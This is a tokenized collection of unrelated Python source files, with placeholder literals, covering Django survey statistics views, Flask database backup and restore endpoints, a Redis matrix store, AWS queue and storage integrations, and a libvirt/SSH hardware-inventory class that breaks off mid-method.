'<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> data = Survey . objects . filter ( pk = survey . id ) . values ( * survey_values ) [ <NUM_LIT:0> ] <EOL> data [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey ) . count ( ) <EOL> data [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey , survey_complete = True ) . count ( ) <EOL> questions = Question . objects . filter ( questiongroup__in = QuestionGroup . objects . filter ( assignment__survey = survey ) . distinct ( ) ) . distinct ( ) <EOL> questions_dict = OrderedDict ( ) <EOL> data [ '<STR_LIT>' ] = { NO_RESPONSE : '<STR_LIT>' } <EOL> for q in questions : <EOL> new_q_values = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> new_q = Question . objects . filter ( pk = q . id ) . values ( * new_q_values ) [ <NUM_LIT:0> ] <EOL> new_q [ '<STR_LIT>' ] = Assignment . objects . filter ( survey = survey , questions__questiongrouporder__question = q ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] = Answer . objects . filter ( assignment__survey = survey , question__question = q ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] = new_q [ '<STR_LIT>' ] - new_q [ '<STR_LIT>' ] <EOL> new_q [ '<STR_LIT>' ] = { } <EOL> new_q [ '<STR_LIT>' ] = OrderedDict ( ) <EOL> new_q [ '<STR_LIT>' ] = q . order <EOL> for a in q . choices . all ( ) : <EOL> new_q [ '<STR_LIT>' ] [ '<STR_LIT:%s>' % a . choice ] = Answer . objects . filter ( assignment__survey = survey , question__question = q , answer = a ) . count ( ) <EOL> new_q [ '<STR_LIT>' ] [ a . display . slug ] = { '<STR_LIT:label>' : a . display . display } <EOL> data [ '<STR_LIT>' ] [ a . choice ] = a . display . slug <EOL> questions_dict [ '<STR_LIT:%s>' % str ( q . id ) ] = new_q <EOL> data [ '<STR_LIT>' ] = questions_dict <EOL> data [ '<STR_LIT>' ] = str ( datetime . datetime . now ( ) ) <EOL> data = json . dumps ( data , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( data , mimetype = '<STR_LIT:application/json>' ) <EOL> class BaseView ( BuildableDetailView ) : <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( BaseView , self ) . get_context_data ( * args , ** kwargs ) <EOL> context [ '<STR_LIT>' ] = base_template <EOL> return context <EOL> class SurveyDetail ( BaseView ) : <EOL> queryset = Survey . objects . all ( ) <EOL> slug_field = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> template_name = '<STR_LIT>' <EOL> class AssignmentDetail ( BaseView ) : <EOL> queryset = Assignment . objects . all ( ) <EOL> slug_field = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( AssignmentDetail , self ) . get_context_data ( * args , ** kwargs ) <EOL> try : <EOL> job_desc = "<STR_LIT>" % slugify ( context [ '<STR_LIT>' ] . respondent . title . short ) <EOL> template . loader . get_template ( job_desc ) <EOL> except template . TemplateDoesNotExist : <EOL> job_desc = "<STR_LIT>" <EOL> context [ '<STR_LIT>' ] = job_desc <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] = True <EOL> return context </s>
<s> """<STR_LIT>""" <EOL> from flask import Response , request , redirect <EOL> from flask . ext . restful import Resource , reqparse <EOL> import next . utils <EOL> import next . broker . broker <EOL> from next . api . api_util import * <EOL> from next . api . api_util import APIArgument <EOL> from next . api . keychain import KeyChain <EOL> from next . api . resource_manager import ResourceManager <EOL> from next . database . database_lib import make_mongodump , restore_mongodump <EOL> resource_manager = ResourceManager ( ) <EOL> broker = next . broker . broker . JobBroker ( ) <EOL> keychain = KeyChain ( ) <EOL> post_parser = reqparse . RequestParser ( argument_class = APIArgument ) <EOL> meta_success = { <EOL> '<STR_LIT:code>' : <NUM_LIT:200> , <EOL> '<STR_LIT:status>' : '<STR_LIT:OK>' <EOL> } <EOL> class DatabaseBackup ( Resource ) : <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' . format ( str ( next . utils . datetimeNow ( ) . strftime ( "<STR_LIT>" ) ) , <EOL> '<STR_LIT>' ) <EOL> location = make_mongodump ( name ) <EOL> zip_file = file ( location ) <EOL> return Response ( zip_file , <EOL> mimetype = '<STR_LIT>' , <EOL> headers = { '<STR_LIT>' : <EOL> '<STR_LIT>' . format ( name ) } ) <EOL> class DatabaseRestore ( Resource ) : <EOL> def post ( self ) : <EOL> """<STR_LIT>""" <EOL> name = str ( next . utils . datetimeNow ( ) . strftime ( "<STR_LIT>" ) ) + '<STR_LIT>' <EOL> primary_file = request . files [ '<STR_LIT>' ] <EOL> restore_mongodump ( primary_file , name ) <EOL> return redirect ( '<STR_LIT>' ) </s>
<s> from . LUCB import * </s>
<s> from . BeatTheMean import * </s>
<s> from jinja2 import Environment , FileSystemLoader <EOL> import requests <EOL> import json <EOL> import os <EOL> import next . broker . broker <EOL> from next . api . resource_manager import ResourceManager <EOL> from next . api . targetmapper import TargetMapper <EOL> TEMPLATES_DIRECTORY = os . path . dirname ( __file__ ) <EOL> loader = FileSystemLoader ( TEMPLATES_DIRECTORY ) <EOL> env = Environment ( loader = loader ) <EOL> resource_manager = ResourceManager ( ) <EOL> broker = next . broker . broker . JobBroker ( ) <EOL> targetmapper = TargetMapper ( ) <EOL> class WidgetGenerator ( ) : <EOL> def getQuery ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = args [ "<STR_LIT>" ] <EOL> if '<STR_LIT>' in args [ '<STR_LIT:args>' ] . keys ( ) : <EOL> args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = exp_uid + "<STR_LIT:_>" + args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> response_dict = json . loads ( response_json ) <EOL> for target_index in response_dict [ "<STR_LIT>" ] : <EOL> target_index [ '<STR_LIT:target>' ] = targetmapper . get_target_data ( exp_uid , target_index [ "<STR_LIT:index>" ] ) <EOL> query = { } <EOL> for target in response_dict [ "<STR_LIT>" ] : <EOL> query [ target [ '<STR_LIT:label>' ] ] = target [ '<STR_LIT:target>' ] <EOL> template = env . get_template ( "<STR_LIT>" ) <EOL> return { '<STR_LIT:html>' : template . render ( query = query ) , '<STR_LIT:args>' : response_dict } <EOL> def processAnswer ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = resource_manager . get_app_id ( exp_uid ) <EOL> try : <EOL> target_winner = args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] <EOL> except : <EOL> return { '<STR_LIT:message>' : "<STR_LIT>" , '<STR_LIT:code>' : <NUM_LIT> , '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <NUM_LIT> <EOL> index_winner = int ( targetmapper . get_index_given_targetID ( exp_uid , target_winner ) ) <EOL> args [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = index_winner <EOL> print args <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> print response_json , didSucceed , message <EOL> return { '<STR_LIT:html>' : "<STR_LIT:success>" } <EOL> def getStats ( self , args ) : <EOL> """<STR_LIT>""" <EOL> exp_uid = args [ "<STR_LIT>" ] <EOL> app_id = resource_manager . get_app_id ( exp_uid ) <EOL> args_json = json . dumps ( args [ "<STR_LIT:args>" ] ) <EOL> response_json , didSucceed , message = broker . applyAsync ( app_id , exp_uid , "<STR_LIT>" , args_json ) <EOL> response_dict = json . loads ( response_json , parse_float = lambda o : round ( float ( o ) , <NUM_LIT:4> ) ) <EOL> try : <EOL> for d in response_dict [ "<STR_LIT:data>" ] : <EOL> try : <EOL> if '<STR_LIT:index>' in d . keys ( ) : <EOL> try : <EOL> d [ "<STR_LIT:target>" ] = targetmapper . get_target_data ( exp_uid , d [ "<STR_LIT:index>" ] ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> except : <EOL> pass <EOL> except : <EOL> pass <EOL> return { '<STR_LIT>' : response_dict } <EOL> def getInfo ( self , args ) : <EOL> """<STR_LIT>""" <EOL> info = { } <EOL> response = resource_manager . get_experiment ( args [ '<STR_LIT>' ] ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> info [ '<STR_LIT>' ] = response . get ( "<STR_LIT>" , <NUM_LIT:100> ) <EOL> print info <EOL> return { '<STR_LIT>' : info } </s>
<s> import redis <EOL> import json <EOL> import numpy <EOL> from numpy import * <EOL> BUCKET_KEY = '<STR_LIT>' <EOL> BUCKET_LIMIT = <NUM_LIT> <EOL> EXP_LENGTH = '<STR_LIT>' <EOL> EXP_ID = '<STR_LIT>' <EOL> class Matrix : <EOL> def __init__ ( self , expId , subId , embedding = None ) : <EOL> self . conn = redis . StrictRedis ( host = '<STR_LIT:localhost>' , port = <NUM_LIT> , db = <NUM_LIT:0> ) <EOL> self . expId = expId <EOL> self . subId = subId <EOL> if embedding != None : <EOL> self . save ( self . expId , embedding ) <EOL> def save ( self , expId , embedding ) : <EOL> embedding = array ( embedding , ndmin = <NUM_LIT:2> ) <EOL> pipe = self . conn . pipeline ( ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> length = len ( embedding ) <EOL> if self . exists ( expId , self . subId ) and length < self . __len__ ( expId ) : <EOL> print '<STR_LIT>' <EOL> self . delete ( expId , self . subId ) <EOL> for index in range ( length ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( expId , bucket , self . subId ) <EOL> val_dict = { '<STR_LIT>' : embedding [ index , : ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> index += <NUM_LIT:1> <EOL> pipe . set ( EXP_LENGTH % ( expId , self . subId ) , length ) <EOL> pipe . execute ( ) <EOL> def getEmbedding ( self ) : <EOL> pipe = self . conn . pipeline ( ) <EOL> blen = int ( self . __len__ ( ) / BUCKET_LIMIT ) <EOL> results = [ ] <EOL> if blen == <NUM_LIT:0> : <EOL> blen = <NUM_LIT:1> <EOL> for i in range ( blen ) : <EOL> pipe . hvals ( BUCKET_KEY % ( self . expId , i , self . subId ) ) <EOL> items = pipe . execute ( ) <EOL> for i in range ( len ( items ) ) : <EOL> for j in range ( len ( items [ i ] ) ) : <EOL> data = json . loads ( items [ i ] [ j ] ) <EOL> results . append ( data [ '<STR_LIT>' ] ) <EOL> return results <EOL> def append ( self , value , expId = None , subId = None ) : <EOL> if expId == None : <EOL> expId = self . expId <EOL> if subId == None : <EOL> subId = self . subId <EOL> embedding = array ( value , ndmin = <NUM_LIT:2> ) <EOL> pipe = self . conn . pipeline ( ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> length = len ( embedding ) <EOL> index = self . __len__ ( expId , subId ) <EOL> for i in range ( length ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( expId , bucket , subId ) <EOL> val_dict = { '<STR_LIT>' : embedding [ i , : ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> index += <NUM_LIT:1> <EOL> pipe . incrby ( EXP_LENGTH % ( expId , subId ) , length ) <EOL> pipe . execute ( ) <EOL> def __getitem__ ( self , key ) : <EOL> if isinstance ( key , slice ) : <EOL> return [ self [ i ] for i in xrange ( * key . indices ( len ( self ) ) ) ] <EOL> elif isinstance ( key , int ) : <EOL> if key < <NUM_LIT:0> : <EOL> key += len ( self ) <EOL> if key < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> if key >= len ( self ) : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> return self . _getRow ( key ) <EOL> elif isinstance ( key , list ) or isinstance ( key , numpy . ndarray ) : <EOL> return self . _getRows ( key ) <EOL> else : <EOL> raise TypeError , "<STR_LIT>" <EOL> def __setitem__ ( self , key , value ) : <EOL> if isinstance ( key , int ) : <EOL> if key < <NUM_LIT:0> : <EOL> key += len ( self ) <EOL> if key < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> if key >= len ( self ) : <EOL> raise IndexError , "<STR_LIT>" % key <EOL> return self . _setRow ( key , value ) <EOL> elif isinstance ( key , list ) : <EOL> print '<STR_LIT:list>' <EOL> length = len ( key ) <EOL> if length != len ( value ) : <EOL> raise TypeError , "<STR_LIT>" <EOL> else : <EOL> return self . _setRows ( key , value ) <EOL> else : <EOL> raise TypeError , "<STR_LIT>" <EOL> def __len__ ( self , expId = None , subId = None ) : <EOL> if expId == None : <EOL> expId = self . expId <EOL> if subId == None : <EOL> subId = self . subId <EOL> try : <EOL> return int ( self . conn . get ( EXP_LENGTH % ( expId , subId ) ) ) <EOL> except : <EOL> raise ValueError , "<STR_LIT>" % expId <EOL> def _getRow ( self , index ) : <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> items = self . conn . hget ( bucketKey , index ) <EOL> data = json . loads ( items ) <EOL> return data [ '<STR_LIT>' ] <EOL> def _getRows ( self , index ) : <EOL> numargs = len ( index ) <EOL> pipe = self . conn . pipeline ( ) <EOL> for i in range ( numargs ) : <EOL> if index [ i ] >= self . __len__ ( ) or index [ i ] < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % index [ i ] <EOL> bucket = int ( index [ i ] / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> pipe . hget ( bucketKey , index [ i ] ) <EOL> items = pipe . execute ( ) <EOL> results = [ ] <EOL> for i in range ( numargs ) : <EOL> data = json . loads ( items [ i ] ) <EOL> results . append ( data [ '<STR_LIT>' ] ) <EOL> return results <EOL> def _setRow ( self , index , embedding ) : <EOL> embedding = array ( embedding , ndmin = <NUM_LIT:1> ) <EOL> bucket = int ( index / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> val_dict = { '<STR_LIT>' : embedding . tolist ( ) } <EOL> self . conn . hset ( bucketKey , redis_key % index , json . dumps ( val_dict ) ) <EOL> def _setRows ( self , indexes , rows ) : <EOL> length = len ( indexes ) <EOL> pipe = self . conn . pipeline ( ) <EOL> for i in range ( length ) : <EOL> if indexes [ i ] >= self . __len__ ( ) or indexes [ i ] < <NUM_LIT:0> : <EOL> raise IndexError , "<STR_LIT>" % indexes [ i ] <EOL> bucket = int ( indexes [ i ] / BUCKET_LIMIT ) <EOL> bucketKey = BUCKET_KEY % ( self . expId , bucket , self . subId ) <EOL> redis_key = '<STR_LIT:%s>' <EOL> val_dict = { '<STR_LIT>' : rows [ i ] . tolist ( ) } <EOL> pipe . hset ( bucketKey , redis_key % indexes [ i ] , json . dumps ( val_dict ) ) <EOL> pipe . execute ( ) <EOL> def delete ( self , expId , subId ) : <EOL> pipe = self . conn . pipeline ( ) <EOL> length = int ( self . conn . get ( EXP_LENGTH % ( expId , subId ) ) ) <EOL> length /= BUCKET_LIMIT <EOL> for i in range ( length + <NUM_LIT:1> ) : <EOL> pipe . delete ( BUCKET_KEY % ( self . expId , i , subId ) ) <EOL> pipe . delete ( EXP_LENGTH % ( expId , subId ) ) <EOL> pipe . execute ( ) <EOL> def exists ( self , expId , subId ) : <EOL> return self . conn . exists ( EXP_LENGTH % ( expId , subId ) ) <EOL> def getExpId ( self ) : <EOL> return self . expId <EOL> def memory ( self ) : <EOL> return self . conn . info ( ) [ '<STR_LIT>' ] <EOL> def deleteAll ( self ) : <EOL> return self . conn . flushall ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from util . config import ConfigReader <EOL> from threading import Thread <EOL> from boto import sqs , s3 <EOL> import time <EOL> import logging <EOL> import traceback <EOL> class BaseServiceIntegration ( object ) : <EOL> def __init__ ( self ) : <EOL> self . config = ConfigReader ( ) <EOL> self . logger = logging . getLogger ( __name__ ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . default_region = self . config . get_property ( <EOL> self . config . SECTION_AWS_ACCOUNT , <EOL> self . config . OPTION_DEFAULT_REGION <EOL> ) <EOL> class BaseSimpleQueueServiceIntegration ( BaseServiceIntegration ) : <EOL> def __init__ ( self ) : <EOL> super ( BaseSimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> self . conn = sqs . connect_to_region ( self . default_region ) <EOL> def send_message ( self , queue_name , message_body ) : <EOL> self . logger . info ( "<STR_LIT>" % ( queue_name , message_body ) ) <EOL> queue = self . conn . get_queue ( queue_name ) <EOL> self . conn . send_message ( queue , message_body ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> class SimpleQueueServiceIntegration ( BaseSimpleQueueServiceIntegration ) : <EOL> def __init__ ( self , queue_name_in = None , queue_name_out = None ) : <EOL> super ( SimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . queue_name_in = queue_name_in <EOL> self . queue_name_out = queue_name_out <EOL> def handle_queue_in_message ( self , queue_name_in , <EOL> handle_process_message , <EOL> handle_queue_out_message ) : <EOL> queue_in = self . conn . get_queue ( queue_name_in ) <EOL> while True : <EOL> rs = queue_in . get_messages ( ) <EOL> for message in rs : <EOL> self . logger . info ( '<STR_LIT>' % ( queue_in . name , message . get_body ( ) ) ) <EOL> try : <EOL> ret_value = handle_process_message ( message . get_body ( ) ) <EOL> queue_in . delete_message ( message ) <EOL> handle_queue_out_message ( ret_value ) <EOL> except Exception : <EOL> self . logger . error ( '<STR_LIT>' ) <EOL> traceback . print_exc ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def handle_process_message ( self , message_body ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def handle_queue_out_message ( self , response_body ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def start_listening ( self ) : <EOL> self . logger . info ( '<STR_LIT>' % self . queue_name_in ) <EOL> thread_sqs = Thread ( target = self . handle_queue_in_message , <EOL> args = ( <EOL> self . queue_name_in , <EOL> self . handle_process_message , <EOL> self . handle_queue_out_message , <EOL> ) ) <EOL> thread_sqs . daemon = True <EOL> thread_sqs . start ( ) <EOL> return thread_sqs <EOL> class SimpleStorageServiceIntegration ( BaseServiceIntegration ) : <EOL> def __init__ ( self ) : <EOL> super ( SimpleStorageServiceIntegration , self ) . __init__ ( ) <EOL> bucket_name = self . config . get_property ( <EOL> self . config . SECTION_AWS_S3 , self . config . OPTION_BUCKET_NAME ) <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> conn = s3 . connect_to_region ( self . default_region ) <EOL> self . logger . debug ( "<STR_LIT>" % bucket_name ) <EOL> self . bucket = conn . get_bucket ( bucket_name ) <EOL> def list ( self ) : <EOL> return self . bucket . list ( ) <EOL> def download_file ( self , key , dst_filename ) : <EOL> self . logger . debug ( "<STR_LIT>" % key ) <EOL> key = self . bucket . get_key ( key ) <EOL> key . get_contents_to_filename ( dst_filename ) <EOL> class TaxReceiptSimpleQueueServiceIntegration ( SimpleQueueServiceIntegration ) : <EOL> def __init__ ( self , handle_process_message_function , handle_queue_out_message_function ) : <EOL> super ( TaxReceiptSimpleQueueServiceIntegration , self ) . __init__ ( ) <EOL> self . queue_name_in = self . config . get_property ( <EOL> self . config . SECTION_AWS_SQS , self . config . OPTION_QUEUE_NAME_IN ) <EOL> self . queue_name_out = self . config . get_property ( <EOL> self . config . SECTION_AWS_SQS , self . config . OPTION_QUEUE_NAME_OUT ) <EOL> if not handle_process_message_function is None : <EOL> self . handle_process_message_function = handle_process_message_function <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not handle_queue_out_message_function is None : <EOL> self . handle_queue_out_message_function = handle_queue_out_message_function <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def handle_process_message ( self , message_body ) : <EOL> return self . handle_process_message_function ( self . queue_name_in , message_body ) <EOL> def handle_queue_out_message ( self , response_body ) : <EOL> return self . handle_queue_out_message_function ( self . queue_name_out , response_body ) </s>
<s> import code <EOL> '''<STR_LIT>''' <EOL> __author__ = "<STR_LIT>" <EOL> from definitionsClass import definitionsClass <EOL> from auxiliary_functions import get_ssh_connection <EOL> import libvirt <EOL> from xml . etree import ElementTree <EOL> import paramiko <EOL> import re <EOL> import yaml <EOL> def getCredentials ( creds , data ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" , creds , data <EOL> for cred in creds : <EOL> print cred [ <NUM_LIT:1> ] + "<STR_LIT>" , <EOL> if cred [ <NUM_LIT:0> ] == libvirt . VIR_CRED_AUTHNAME : <EOL> cred [ <NUM_LIT:4> ] = data <EOL> elif cred [ <NUM_LIT:0> ] == libvirt . VIR_CRED_PASSPHRASE : <EOL> cred [ <NUM_LIT:4> ] = data <EOL> else : <EOL> return - <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> class RADclass ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = None <EOL> self . machine = None <EOL> self . user = None <EOL> self . password = None <EOL> self . nodes = dict ( ) <EOL> self . nr_processors = None <EOL> self . processor_family = None <EOL> self . processor_manufacturer = None <EOL> self . processor_version = None <EOL> self . processor_features = None <EOL> self . memory_type = None <EOL> self . memory_freq = None <EOL> self . memory_nr_channels = None <EOL> self . memory_size = None <EOL> self . memory_hugepage_sz = None <EOL> self . hypervisor = Hypervisor ( ) <EOL> self . os = OpSys ( ) <EOL> self . ports_list = list ( ) <EOL> def obtain_RAD ( self , user , password , machine ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> try : <EOL> ( return_status , code ) = get_ssh_connection ( machine , user , password ) <EOL> if not return_status : <EOL> print '<STR_LIT>' , code <EOL> return ( return_status , code ) <EOL> ssh_conn = code <EOL> self . connection_IP = machine <EOL> virsh_conn = libvirt . open ( "<STR_LIT>" + user + '<STR_LIT:@>' + machine + "<STR_LIT>" ) <EOL> machine_name = get_hostname ( virsh_conn ) <EOL> ( return_status , code ) = self . set_name ( machine_name ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> processors = dict ( ) <EOL> ( return_status , code ) = get_processor_information ( ssh_conn , virsh_conn , processors ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> memory_nodes = dict ( ) <EOL> ( return_status , code ) = get_memory_information ( ssh_conn , virsh_conn , memory_nodes ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> nic_topology = dict ( ) <EOL> ( return_status , code ) = get_nic_information ( ssh_conn , virsh_conn , nic_topology ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> for socket_id , processor in processors . iteritems ( ) : <EOL> node = Node ( ) <EOL> if not socket_id in nic_topology : <EOL> nic_topology [ socket_id ] = list ( ) <EOL> ( return_status , code ) = node . set ( processor , memory_nodes [ socket_id ] , nic_topology [ socket_id ] ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . insert_node ( node ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> os = OpSys ( ) <EOL> ( return_status , code ) = get_os_information ( ssh_conn , os ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . set_os ( os ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> hypervisor = Hypervisor ( ) <EOL> ( return_status , code ) = get_hypervisor_information ( virsh_conn , hypervisor ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ( return_status , code ) = self . set_hypervisor ( hypervisor ) <EOL> if not return_status : <EOL> return ( return_status , '<STR_LIT>' + machine + '<STR_LIT>' + code ) <EOL> warning_text += code <EOL> ssh_conn . close ( ) <EOL> return ( True , warning_text ) <EOL> except libvirt . libvirtError , e : <EOL> text = e . get_error_message ( ) <EOL> print '<STR_LIT>' , text <EOL> return ( False , text ) <EOL> except paramiko . ssh_exception . SSHException , e : <EOL> text = e . args [ <NUM_LIT:0> ] <EOL> print "<STR_LIT>" , text <EOL> return False , text <EOL> def set_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( name , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . name = name <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_connection_info ( self , machine , user , password ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( machine , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( user , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . machine , self . user , self . password ) = ( machine , user , password ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def insert_node ( self , node ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( node , Node ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if node . id_ in self . nodes : <EOL> return ( False , '<STR_LIT>' ) <EOL> for port_key in node . ports_list : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> self . nodes [ node . id_ ] = node <EOL> self . update_variables ( ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def update_variables ( self ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> self . nr_processors = len ( self . nodes ) <EOL> prev_processor_family = prev_processor_manufacturer = prev_processor_version = prev_processor_features = None <EOL> different_processor_family = different_processor_manufacturer = different_processor_version = different_processor_features = False <EOL> for node in self . nodes . itervalues ( ) : <EOL> ( self . processor_family , self . processor_manufacturer , self . processor_version , self . processor_features ) = node . get_processor_info ( ) <EOL> if prev_processor_family != None and self . processor_family != prev_processor_family : <EOL> different_processor_family = True <EOL> if prev_processor_manufacturer != None and self . processor_manufacturer != prev_processor_manufacturer : <EOL> different_processor_manufacturer = True <EOL> if prev_processor_version != None and self . processor_version != prev_processor_version : <EOL> different_processor_version = True <EOL> if prev_processor_features != None and self . processor_features != prev_processor_features : <EOL> different_processor_features = True <EOL> ( prev_processor_family , prev_processor_manufacturer , prev_processor_version , prev_processor_features ) = ( self . processor_family , self . processor_manufacturer , self . processor_version , self . processor_features ) <EOL> if different_processor_family : <EOL> self . processor_family = None <EOL> if different_processor_features : <EOL> self . processor_features = None <EOL> if different_processor_manufacturer : <EOL> self . processor_manufacturer = None <EOL> if different_processor_version : <EOL> self . processor_version = None <EOL> self . memory_size = <NUM_LIT:0> <EOL> different_memory_freq = different_memory_nr_channels = different_memory_type = different_memory_hugepage_sz = False <EOL> prev_memory_freq = prev_memory_nr_channels = prev_memory_type = prev_memory_hugepage_sz = None <EOL> for node in self . nodes . itervalues ( ) : <EOL> ( self . memory_freq , self . memory_nr_channels , self . memory_type , memory_size , self . memory_hugepage_sz ) = node . get_memory_info ( ) <EOL> self . memory_size += memory_size <EOL> if prev_memory_freq != None and self . memory_freq != prev_memory_freq : <EOL> different_memory_freq = True <EOL> if prev_memory_nr_channels != None and self . memory_nr_channels != prev_memory_nr_channels : <EOL> different_memory_nr_channels = True <EOL> if prev_memory_type != None and self . memory_type != prev_memory_type : <EOL> different_memory_type = True <EOL> if prev_memory_hugepage_sz != None and self . memory_hugepage_sz != prev_memory_hugepage_sz : <EOL> different_memory_hugepage_sz = True <EOL> ( prev_memory_freq , prev_memory_nr_channels , prev_memory_type , prev_memory_hugepage_sz ) = ( self . memory_freq , self . memory_nr_channels , self . memory_type , self . memory_hugepage_sz ) <EOL> if different_memory_freq : <EOL> self . memory_freq = None <EOL> if different_memory_nr_channels : <EOL> self . memory_nr_channels = None <EOL> if different_memory_type : <EOL> self . memory_type = None <EOL> if different_memory_hugepage_sz : <EOL> warning_text += '<STR_LIT>' <EOL> return ( True , warning_text ) <EOL> def set_hypervisor ( self , hypervisor ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( hypervisor , Hypervisor ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . hypervisor . assign ( hypervisor ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_os ( self , os ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( os , OpSys ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . os . assign ( os ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . name + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . nr_processors ) + '<STR_LIT:\n>' <EOL> 